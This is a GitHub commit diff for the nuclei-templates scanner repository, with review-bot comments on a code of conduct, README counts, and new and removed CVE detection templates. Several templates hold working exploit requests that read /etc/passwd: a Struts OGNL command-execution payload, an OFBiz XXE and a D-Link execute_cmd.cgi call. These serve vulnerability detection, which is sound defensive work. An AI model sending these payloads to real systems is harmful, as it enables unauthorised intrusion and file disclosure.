Merge pull request #8 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-02-03 23:21:44 +05:30 committed by GitHub
commit 26f6d372ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
94 changed files with 1258 additions and 58031 deletions

76
CODE_OF_CONDUCT.md Normal file
View File

@ -0,0 +1,76 @@
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at contact@projectdiscovery.io. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq

View File

@ -1,6 +1,6 @@
MIT License
Copyright (c) 2020 Exposed Atoms.
Copyright (c) 2020 ProjectDiscovery, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
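Review bot: the copyright line changes the holder from Exposed Atoms to ProjectDiscovery, Inc. while keeping the 2020 year; a change of license holder should be called out in the PR description (the commit message is just "Updation") so downstream users of the templates notice the attribution change.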

202
README.md
View File

@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 154 | default-logins | 8 |
| dns | 6 | exposed-panels | 73 |
| exposed-tokens | 9 | exposures | 40 |
| fuzzing | 5 | helpers | 3 |
| miscellaneous | 14 | misconfiguration | 37 |
| takeovers | 1 | technologies | 44 |
| vulnerabilities | 66 | workflows | 17 |
| cves | 165 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 41 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 39 |
| takeovers | 1 | technologies | 46 |
| vulnerabilities | 75 | workflows | 17 |
**Tree structure of nuclei templates:**
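Review bot: the new counts in the table sum to 499 templates, which with CODE_OF_CONDUCT.md, LICENSE.md and README.md gives 502 files, but the footer hunk of this same file changes the total to "55 directories, 508 files". The old numbers did agree (477 templates + 2 top-level files = 479), so either a table cell or the footer is stale; regenerate both from the same `tree` run before merging.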
@ -43,6 +43,7 @@ An overview of the nuclei template directory including number of templates assoc
<summary> Nuclei templates </summary>
```
├── CODE_OF_CONDUCT.md
├── LICENSE.md
├── README.md
├── cves
@ -75,6 +76,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-1273.yaml
│   │   ├── CVE-2018-13379.yaml
│   │   ├── CVE-2018-13380.yaml
│   │   ├── CVE-2018-14574.yaml
│   │   ├── CVE-2018-14728.yaml
│   │   ├── CVE-2018-16341.yaml
│   │   ├── CVE-2018-16763.yaml
@ -89,7 +91,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-5230.yaml
│   │   ├── CVE-2018-7251.yaml
│   │   ├── CVE-2018-7490.yaml
│   │   └── CVE-2018-8006.yaml
│   │   ├── CVE-2018-8006.yaml
│   │   └── CVE-2018-8033.yaml
│   ├── 2019
│   │   ├── CVE-2019-10092.yaml
│   │   ├── CVE-2019-1010287.yaml
@ -117,6 +120,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-16759.yaml
│   │   ├── CVE-2019-16920.yaml
│   │   ├── CVE-2019-17382.yaml
│   │   ├── CVE-2019-17506.yaml
│   │   ├── CVE-2019-17558.yaml
│   │   ├── CVE-2019-18394.yaml
│   │   ├── CVE-2019-19368.yaml
@ -145,69 +149,78 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-9733.yaml
│   │   ├── CVE-2019-9955.yaml
│   │   └── CVE-2019-9978.yaml
│   └── 2020
│   ├── CVE-2020-0618.yaml
│   ├── CVE-2020-10148.yaml
│   ├── CVE-2020-10199.yaml
│   ├── CVE-2020-10204.yaml
│   ├── CVE-2020-11034.yaml
│   ├── CVE-2020-1147.yaml
│   ├── CVE-2020-11738.yaml
│   ├── CVE-2020-12116.yaml
│   ├── CVE-2020-12720.yaml
│   ├── CVE-2020-13167.yaml
│   ├── CVE-2020-13942.yaml
│   ├── CVE-2020-14179.yaml
│   ├── CVE-2020-14181.yaml
│   ├── CVE-2020-14864.yaml
│   ├── CVE-2020-14882.yaml
│   ├── CVE-2020-15129.yaml
│   ├── CVE-2020-15505.yaml
│   ├── CVE-2020-15920.yaml
│   ├── CVE-2020-16846.yaml
│   ├── CVE-2020-16952.yaml
│   ├── CVE-2020-17505.yaml
│   ├── CVE-2020-17506.yaml
│   ├── CVE-2020-17518.yaml
│   ├── CVE-2020-17519.yaml
│   ├── CVE-2020-1943.yaml
│   ├── CVE-2020-2096.yaml
│   ├── CVE-2020-2140.yaml
│   ├── CVE-2020-23972.yaml
│   ├── CVE-2020-24223.yaml
│   ├── CVE-2020-24312.yaml
│   ├── CVE-2020-2551.yaml
│   ├── CVE-2020-25540.yaml
│   ├── CVE-2020-26214.yaml
│   ├── CVE-2020-3187.yaml
│   ├── CVE-2020-3452.yaml
│   ├── CVE-2020-4463.yaml
│   ├── CVE-2020-5284.yaml
│   ├── CVE-2020-5405.yaml
│   ├── CVE-2020-5410.yaml
│   ├── CVE-2020-5412.yaml
│   ├── CVE-2020-5776.yaml
│   ├── CVE-2020-5777.yaml
│   ├── CVE-2020-5902.yaml
│   ├── CVE-2020-6287.yaml
│   ├── CVE-2020-7209.yaml
│   ├── CVE-2020-7318.yaml
│   ├── CVE-2020-7961.yaml
│   ├── CVE-2020-8091.yaml
│   ├── CVE-2020-8115.yaml
│   ├── CVE-2020-8163.yaml
│   ├── CVE-2020-8191.yaml
│   ├── CVE-2020-8193.yaml
│   ├── CVE-2020-8194.yaml
│   ├── CVE-2020-8209.yaml
│   ├── CVE-2020-8512.yaml
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9047.yaml
│   ├── CVE-2020-9344.yaml
│   ├── CVE-2020-9376.yaml
│   ├── CVE-2020-9484.yaml
│   ├── CVE-2020-9496.yaml
│   └── CVE-2020-9757.yaml
│   ├── 2020
│   │   ├── CVE-2020-0618.yaml
│   │   ├── CVE-2020-10148.yaml
│   │   ├── CVE-2020-11034.yaml
│   │   ├── CVE-2020-1147.yaml
│   │   ├── CVE-2020-11710.yaml
│   │   ├── CVE-2020-11738.yaml
│   │   ├── CVE-2020-12116.yaml
│   │   ├── CVE-2020-12720.yaml
│   │   ├── CVE-2020-13167.yaml
│   │   ├── CVE-2020-13937.yaml
│   │   ├── CVE-2020-13942.yaml
│   │   ├── CVE-2020-14179.yaml
│   │   ├── CVE-2020-14181.yaml
│   │   ├── CVE-2020-14864.yaml
│   │   ├── CVE-2020-14882.yaml
│   │   ├── CVE-2020-15129.yaml
│   │   ├── CVE-2020-15505.yaml
│   │   ├── CVE-2020-15920.yaml
│   │   ├── CVE-2020-16846.yaml
│   │   ├── CVE-2020-16952.yaml
│   │   ├── CVE-2020-17505.yaml
│   │   ├── CVE-2020-17506.yaml
│   │   ├── CVE-2020-17518.yaml
│   │   ├── CVE-2020-17519.yaml
│   │   ├── CVE-2020-17530.yaml
│   │   ├── CVE-2020-1943.yaml
│   │   ├── CVE-2020-2096.yaml
│   │   ├── CVE-2020-2140.yaml
│   │   ├── CVE-2020-23972.yaml
│   │   ├── CVE-2020-24223.yaml
│   │   ├── CVE-2020-24312.yaml
│   │   ├── CVE-2020-24579.yaml
│   │   ├── CVE-2020-2551.yaml
│   │   ├── CVE-2020-25540.yaml
│   │   ├── CVE-2020-26214.yaml
│   │   ├── CVE-2020-27986.yaml
│   │   ├── CVE-2020-3187.yaml
│   │   ├── CVE-2020-3452.yaml
│   │   ├── CVE-2020-35476.yaml
│   │   ├── CVE-2020-4463.yaml
│   │   ├── CVE-2020-5284.yaml
│   │   ├── CVE-2020-5405.yaml
│   │   ├── CVE-2020-5410.yaml
│   │   ├── CVE-2020-5412.yaml
│   │   ├── CVE-2020-5776.yaml
│   │   ├── CVE-2020-5777.yaml
│   │   ├── CVE-2020-5902.yaml
│   │   ├── CVE-2020-6287.yaml
│   │   ├── CVE-2020-7209.yaml
│   │   ├── CVE-2020-7318.yaml
│   │   ├── CVE-2020-7961.yaml
│   │   ├── CVE-2020-8091.yaml
│   │   ├── CVE-2020-8115.yaml
│   │   ├── CVE-2020-8163.yaml
│   │   ├── CVE-2020-8191.yaml
│   │   ├── CVE-2020-8193.yaml
│   │   ├── CVE-2020-8194.yaml
│   │   ├── CVE-2020-8209.yaml
│   │   ├── CVE-2020-8512.yaml
│   │   ├── CVE-2020-8515.yaml
│   │   ├── CVE-2020-8982.yaml
│   │   ├── CVE-2020-9047.yaml
│   │   ├── CVE-2020-9344.yaml
│   │   ├── CVE-2020-9376.yaml
│   │   ├── CVE-2020-9484.yaml
│   │   ├── CVE-2020-9496.yaml
│   │   └── CVE-2020-9757.yaml
│   └── 2021
│   ├── CVE-2021-22873.yaml
│   ├── CVE-2021-25646.yaml
│   └── CVE-2021-3019.yaml
├── default-logins
│   ├── activemq
│   │   └── activemq-default-login.yaml
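Review bot: the cves count moving 154 -> 165 is consistent with this hunk: 13 templates added (CVE-2018-14574, CVE-2018-8033, CVE-2019-17506, CVE-2020-11710, CVE-2020-13937, CVE-2020-17530, CVE-2020-24579, CVE-2020-27986, CVE-2020-35476, CVE-2020-8515 and the three 2021 entries) and 2 removed (CVE-2020-10199, CVE-2020-10204). The two removals are not explained anywhere in the commit; a one-line reason belongs in the PR, since users may reference those templates by path.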
@ -268,6 +281,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── kafka-connect-ui.yaml
│   ├── kafka-monitoring.yaml
│   ├── kafka-topics-ui.yaml
│   ├── key-cloak-admin-panel.yaml
│   ├── kubernetes-dashboard.yaml
│   ├── manage-engine-admanager-panel.yaml
│   ├── mobileiron-login.yaml
@ -331,12 +345,14 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── zip-backup-files.yaml
│   ├── configs
│   │   ├── airflow-configuration-exposure.yaml
│   │   ├── alibaba-canal-info-leak.yaml
│   │   ├── amazon-docker-config-disclosure.yaml
│   │   ├── ansible-config-disclosure.yaml
│   │   ├── composer-config.yaml
│   │   ├── exposed-svn.yaml
│   │   ├── git-config-nginxoffbyslash.yaml
│   │   ├── git-config.yaml
│   │   ├── gmail-api-client-secrets.yaml
│   │   ├── htpasswd-detection.yaml
│   │   ├── laravel-env.yaml
│   │   ├── magento-config.yaml
@ -347,7 +363,6 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── phpinfo.yaml
│   │   ├── rails-database-config.yaml
│   │   ├── redmine-db-config.yaml
│   │   ├── server-status-localhost.yaml
│   │   ├── syfmony-profiler.yaml
│   │   ├── symfony-database-config.yaml
│   │   ├── symfony-profiler.yaml
@ -371,16 +386,12 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── arbitrary-file-read.yaml
│   ├── directory-traversal.yaml
│   ├── generic-lfi-fuzzing.yaml
│   ├── iis-shortname.yaml
│   └── wp-plugin-scan.yaml
│   └── iis-shortname.yaml
├── helpers
│   ├── payloads
│   │   ├── CVE-2020-5776.csv
│   │   └── CVE-2020-6287.xml
│   └── wordlists
│   └── wp-plugins.txt
│   └── payloads
│   ├── CVE-2020-5776.csv
│   └── CVE-2020-6287.xml
├── miscellaneous
│   ├── basic-cors-flash.yaml
│   ├── dir-listing.yaml
│   ├── htaccess-config.yaml
│   ├── missing-csp.yaml
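Review bot: `fuzzing/wp-plugin-scan.yaml` and its `helpers/wordlists/wp-plugins.txt` are dropped here (fuzzing 5 -> 4, helpers 3 -> 2 in the table) with no explanation in the commit message; if the scan was removed for being too noisy or slow, say so, and check that no workflow still points at the `helpers/wordlists/` path, which disappears entirely.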
@ -392,7 +403,6 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── security.txt.yaml
│   ├── trace-method.yaml
│   ├── unencrypted-bigip-ltm-cookie.yaml
│   ├── wp-xmlrpc.yaml
│   └── xml-schema-detect.yaml
├── misconfiguration
│   ├── aem-groovyconsole.yaml
@ -403,12 +413,12 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── aws-redirect.yaml
│   ├── cgi-test-page.yaml
│   ├── django-debug-detect.yaml
│   ├── docker-api.yaml
│   ├── docker-registry.yaml
│   ├── druid-monitor.yaml
│   ├── drupal-user-enum-ajax.yaml
│   ├── drupal-user-enum-redirect.yaml
│   ├── elasticsearch.yaml
│   ├── exposed-docker-api.yaml
│   ├── exposed-kibana.yaml
│   ├── exposed-service-now.yaml
│   ├── front-page-misconfig.yaml
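Review bot: `misconfiguration/docker-api.yaml` becomes `exposed-docker-api.yaml`; a path rename breaks anyone running `nuclei -t misconfiguration/docker-api.yaml` or a workflow that lists the old name, so mention the rename in the changelog alongside the new templates.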
@ -419,13 +429,22 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
│   ├── php-fpm-status.yaml
│   ├── put-method-enabled.yaml
│   ├── rack-mini-profiler.yaml
│   ├── salesforce-aura-misconfig.yaml
│   ├── server-status-localhost.yaml
│   ├── shell-history.yaml
│   ├── sidekiq-dashboard.yaml
│   ├── springboot-detect.yaml
│   ├── springboot
│   │   ├── springboot-configprops.yaml
│   │   ├── springboot-env.yaml
│   │   ├── springboot-heapdump.yaml
│   │   ├── springboot-loggers.yaml
│   │   ├── springboot-mappings.yaml
│   │   └── springboot-trace.yaml
│   ├── symfony-debugmode.yaml
│   ├── tomcat-scripts.yaml
│   ├── unauthenticated-airflow.yaml
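Review bot: `misconfiguration/springboot-detect.yaml` is removed while a `springboot/` directory of six actuator templates and `technologies/detect-springboot-actuator.yaml` are added; any workflow that referenced the old detect template now points at a missing file and should be updated to the `technologies/` path. Since each of the six new templates probes one actuator endpoint, gating them on the detect template in a workflow would keep the per-host request count down.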
@ -442,6 +461,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── cacti-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── detect-springboot-actuator.yaml
│   ├── favicon-detection.yaml
│   ├── firebase-detect.yaml
│   ├── google-storage.yaml
@ -468,6 +488,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── s3-detect.yaml
│   ├── sap-netweaver-as-java-detect.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── selea-ip-camera.yaml
│   ├── shiro-detect.yaml
│   ├── sql-server-reporting.yaml
│   ├── tech-detect.yaml
@ -505,12 +526,16 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── oracle
│   │   └── oracle-ebs-bispgraph-file-access.yaml
│   ├── other
│   │   ├── CNVD-2020-62422.yaml
│   │   ├── acme-xss.yaml
│   │   ├── aspnuke-openredirect.yaml
│   │   ├── bullwark-momentum-series-directory-traversal.yaml
│   │   ├── bullwark-momentum-lfi.yaml
│   │   ├── cached-aem-pages.yaml
│   │   ├── chamilo-lms-xss.yaml
│   │   ├── couchdb-adminparty.yaml
│   │   ├── discourse-xss.yaml
│   │   ├── dlink-850L-info-leak.yaml
│   │   ├── keycloak-xss.yaml
│   │   ├── mcafee-epo-rce.yaml
│   │   ├── microstrategy-ssrf.yaml
│   │   ├── mida-eframework-xss.yaml
@ -520,13 +545,16 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── rce-shellshock-user-agent.yaml
│   │   ├── rce-via-java-deserialization.yaml
│   │   ├── rconfig-rce.yaml
│   │   ├── sangfor-edr-rce.yaml
│   │   ├── sick-beard-xss.yaml
│   │   ├── sonicwall-sslvpn-shellshock.yaml
│   │   ├── symantec-messaging-gateway.yaml
│   │   ├── thinkific-redirect.yaml
│   │   ├── tikiwiki-reflected-xss.yaml
│   │   ├── twig-php-ssti.yaml
│   │   ├── vpms-auth-bypass.yaml
│   │   ├── wems-manager-xss.yaml
│   │   ├── wooyun-path-traversal.yaml
│   │   ├── yarn-resourcemanager-rce.yaml
│   │   └── zms-auth-bypass.yaml
│   ├── rails
@ -557,7 +585,9 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── wordpress-tmm-db-migrate.yaml
│   ├── wordpress-user-enumeration.yaml
│   ├── wordpress-wordfence-xss.yaml
│   └── wordpress-wpcourses-info-disclosure.yaml
│   ├── wordpress-wpcourses-info-disclosure.yaml
│   ├── wp-enabled-registration.yaml
│   └── wp-xmlrpc.yaml
└── workflows
├── artica-web-proxy-workflow.yaml
├── bigip-workflow.yaml
@ -580,7 +610,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**54 directories, 479 files**.
**55 directories, 508 files**.
📖 Documentation
-----

View File

@ -0,0 +1,22 @@
id: CVE-2018-14574
info:
name: Django Open Redirect
author: pikpikcu
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}//www.example.com"
matchers-condition: and
matchers:
- type: status
status:
- 301
- type: word
words:
- "Location: https://www.example.com"
- "Location: http://www.example.com"
part: header
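Review bot: the `words` matcher lists two `Location:` values without a `condition`, which defaults to OR and is what is wanted here, but `info` has no `description` or `reference`, unlike the other CVE templates in this commit; add the advisory link and the affected Django versions so a `low` finding can be triaged. Also note that `{{BaseURL}}//www.example.com` yields a triple slash when the supplied target already ends in `/`; document that the template expects a bare base URL.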

View File

@ -0,0 +1,28 @@
id: CVE-2018-8033
info:
name: Apache OFBiz XXE
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
requests:
- raw:
- |
POST /webtools/control/xmlrpc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: application/xml
<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200
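Review bot: the regex `root:[x*]:0:0:` proves the XXE only on targets with a Unix `/etc/passwd`; an OFBiz instance on Windows returns no match and is reported clean, so the description should state that the check is `/etc/passwd` based. The `info` block also lacks a `reference` field while CVE-2019-17506 in the same commit carries one; keep the metadata consistent across the new templates.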

View File

@ -0,0 +1,28 @@
id: CVE-2019-17506
info:
name: DLINK DIR-868L & DIR-817LW Info Leak
author: pikpikcu
severity: critical
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</password>"
- "DEVICE.ACCOUNT"
part: body
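Review bot: the body matcher lists `</password>` and `DEVICE.ACCOUNT` with no `condition`, so it defaults to OR, and `DEVICE.ACCOUNT` is the exact string sent in the request body; any device that echoes its request parameters back will match without disclosing a password. Add `condition: and` (as CVE-2021-3019 in this commit does) or drop the `DEVICE.ACCOUNT` word. `severity: critical` on a template named "Info Leak" also needs a `description` explaining what is leaked (the `</password>` match suggests account credentials) so the rating is justified.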

View File

@ -1,27 +0,0 @@
id: CVE-2020-10199
info:
name: Nexus Repository Manager 3 RCE
author: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400
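Review bot: this template is deleted without a reason in the commit message ("Updation"); if it is being dropped because the `1787569` match against a 400 response proved unreliable, or because the endpoint needs a session, say so in the PR so users who pinned `cves/2020/CVE-2020-10199.yaml` know why it went away.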

View File

@ -1,25 +0,0 @@
id: CVE-2020-10204
info:
name: Sonatype Nexus Repository RCE
author: hetroublemakr
severity: high
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200
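Review bot: the deleted template's own description says the bug needs an administrative account on NXRM, so an unauthenticated scan could never trigger it; that is a sound reason to remove it, but record it in the commit message rather than leaving the deletion silent.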

View File

@ -0,0 +1,28 @@
id: CVE-2020-11710
info:
name: Kong Admin Rest API Unauth
author: pikpikcu
severity: info
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710
requests:
- method: GET
path:
- "{{BaseURL}}"
# - "{{BaseURL}}/endpoints"
# - "{{BaseURL}}/status"
matchers-condition: and
matchers:
- type: word
words:
- 'Welcome to kong'
- 'configuration'
- 'kong_env'
condition: and
part: body
- type: status
status:
- 200
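Review bot: `severity: info` is inconsistent with the name "Kong Admin Rest API Unauth": an unauthenticated admin API is a finding, not an informational fingerprint, so align the severity with the NVD entry given in `reference`. The two commented-out paths (`/endpoints`, `/status`) should either be enabled or removed; dead configuration in a template only confuses the next editor.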

View File

@ -0,0 +1,40 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
# References:
# https://s.tencent.com/research/bsafe/1156.html
# https://nvd.nist.gov/vuln/detail/CVE-2020-13937
requests:
- method: GET
path:
- "{{BaseURL}}/kylin/api/admin/config"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "config"
condition: and
part: body
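Review bot: `condition: and` on the single-entry `application/json` and `config` word lists is a no-op, and the body word `config` is weak enough that many JSON endpoints would satisfy it; match a Kylin-specific key from the `/kylin/api/admin/config` response instead. The two `# References` comment lines should move into a `reference:` field of `info`, which the other new templates in this commit use.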

View File

@ -0,0 +1,26 @@
id: CVE-2020-17530
info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
# References:
# http://jvn.jp/en/jp/JVN43969166/index.html
# http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
# https://cwiki.apache.org/confluence/display/WW/S2-061
# https://security.netapp.com/advisory/ntap-20210115-0005/
requests:
- method: GET
path:
- "{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
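Review bot: the affected range and references are YAML comments rather than `info.description` / `info.reference` fields, so they never reach nuclei's output; the comment already has the text ("Apache Struts 2.0.0 - Struts 2.5.25") ready to move. `description` should also say plainly that the request executes `cat /etc/passwd` on the target through `freemarker.template.utility.Execute`, i.e. this is an active exploit rather than a version probe, so operators can exclude it where command execution is out of scope.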

View File

@ -0,0 +1,46 @@
id: CVE-2020-24579
info:
name: DLINK DSL 2888a RCE
author: pikpikcu
severity: medium
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
requests:
- raw:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:[x*]:0:0"
condition: or
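Review bot: both raw requests declare `Content-Length: 0`, but the first one carries a form body (`username=admin&password=...`), so the header is wrong for that request and should be dropped and left to be computed. `severity: medium` does not fit a template named "DLINK DSL 2888a RCE" whose second request runs `cat /etc/passwd` through `execute_cmd.cgi`. The hard-coded password hash and the fixed `Cookie: uid=6gPjT2ipmNz` deserve a comment explaining why constant values work; the `# Response:Location: /page/login/login_fail.html` remark hints that the login is expected to fail, which is the interesting part and should be spelled out.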

View File

@ -0,0 +1,31 @@
id: CVE-2020-27986
info:
name: SonarQube unauth
author: pikpikcu
severity: medium
description: |
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
# Refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
requests:
- method: GET
path:
- "{{BaseURL}}/api/settings/values"
matchers-condition: and
matchers:
- type: word
words:
- email.smtp_host.secured
- email.smtp_password.secured
- email.smtp_port.secured
- email.smtp_username.secured
part: body
condtion: and
- type: status
status:
- 200
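Review bot: `condtion: and` is misspelled, so nuclei ignores the key and the four `email.smtp_*` words fall back to the default OR; any one of them in the body fires the template. Fix the key to `condition` (the same typo appears in the CVE-2020-35476 and CVE-2021-25646 templates of this commit). `# Refrences` is also misspelled and should become a `reference:` field rather than a comment.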

View File

@ -0,0 +1,32 @@
id: CVE-2020-35476
info:
name: OpenTSDB 2.4.0 Remote Code Execution
author: pikpikcu
severity: critical
